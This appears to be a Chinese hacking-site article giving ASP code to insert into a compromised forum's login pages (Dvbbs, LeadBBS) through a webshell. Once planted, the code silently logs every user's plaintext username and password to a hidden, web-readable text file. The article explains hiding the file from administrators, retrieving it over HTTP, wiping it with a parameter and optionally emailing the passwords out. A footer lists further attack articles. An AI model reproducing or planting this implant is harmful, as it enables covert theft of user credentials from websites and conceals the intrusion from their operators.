用asp记录论坛用户密码(dvbbs,leadbbs等)

所属分类: 实用技巧 / 漏洞研究 阅读数: 1870
收藏 0 赞 0 分享

很多人在得到动网的数据库后郁闷不已 (呀的,管理员的变态密码让我们的机器跑砸了都没辙)  
Now We Have Another Method!!!!!  这就是用asp记录明文密码。  

用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。  
2.将PATH换成web下可访问的路径,如:C:\Inetpub\wwwroot\...\Info.txt(info.txt的路径越深越好,防止admin发现)  
3.你的webshell必须有权限修改文件且FileSystemObject可用。  
4.一段时间后在IE上 访问:http://.../Info.txt就 可以看到登录过的用户的帐号密码。  
5.在IE上输http://.../(which your modified).asp?u=del可一清楚info.txt的内容。  

注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。  
2.为了防止info.txt过大,我用清空info.txt的方法。  
当然你可以新建文件来解决此问题。  
if filesize>200000 then  
set file2=fso.OpenTextFile(PATH,2,True)  
file2.WriteLine ""  
file2.close  
end if  
--------------------------------------------------------------------  
<%  
dim fso  
dim file  
dim file2  
dim filesize  
dim file3  
set fso=server.createobject("Scripting.FileSystemObject")  
If Request("u")="del" Then  
set file=fso.OpenTextFile(PATH,2,True)  
file.WriteLine ""  
End If  
If fso.FileExists("PATH") Then  
set file=fso.OpenTextFile(PATH,8,True)  
Else  
set file=fso.CreateTextFile(PATH)  
end if  
file.WriteLine "Username:"+Request.form("Username")  
file.WriteLine "Password:"+Request.form("password")  
file.close  
set file3=fso.GetFile(PATH)  
filesize=file3.size  
if filesize>200000 then  
set file2=fso.OpenTextFile(PATH,2,True)  
file2.WriteLine ""  
file2.close  
end if  

set file=nothing  
set file2=nothing  
set filesize=nothing  
set fso=nothing  
%>  
----------------------------------------------------------------------  

By ymqsz  
E-mail:ymqsz@tom.com  

更多精彩内容其他人还在看

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
收藏 0 赞 0 分享

跨站脚本攻击+Cookies欺骗(Discuz篇)

跨站脚本攻击+Cookies欺骗(Discuz篇)
收藏 0 赞 0 分享

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞
收藏 0 赞 0 分享

关于对SQL注入80004005 及其它错误消息分析

关于对SQL注入80004005 及其它错误消息分析
收藏 0 赞 0 分享

针对蓝牙PIN码的最新攻击技术细节分析

针对蓝牙PIN码的最新攻击技术细节分析
收藏 0 赞 0 分享

细说3721网络实名“病毒”

细说3721网络实名“病毒”
收藏 0 赞 0 分享

浅谈SQL SERVER数据库口令的脆弱性

浅谈SQL SERVER数据库口令的脆弱性
收藏 0 赞 0 分享

MSHTA漏洞为黑客大开远程控制之门(图)

MSHTA漏洞为黑客大开远程控制之门(图)
收藏 0 赞 0 分享

再探九酷网络个人主页空间管理系统

再探九酷网络个人主页空间管理系统
收藏 0 赞 0 分享

黑客突破防火墙常用的几种技术

黑客突破防火墙常用的几种技术
收藏 0 赞 0 分享
查看更多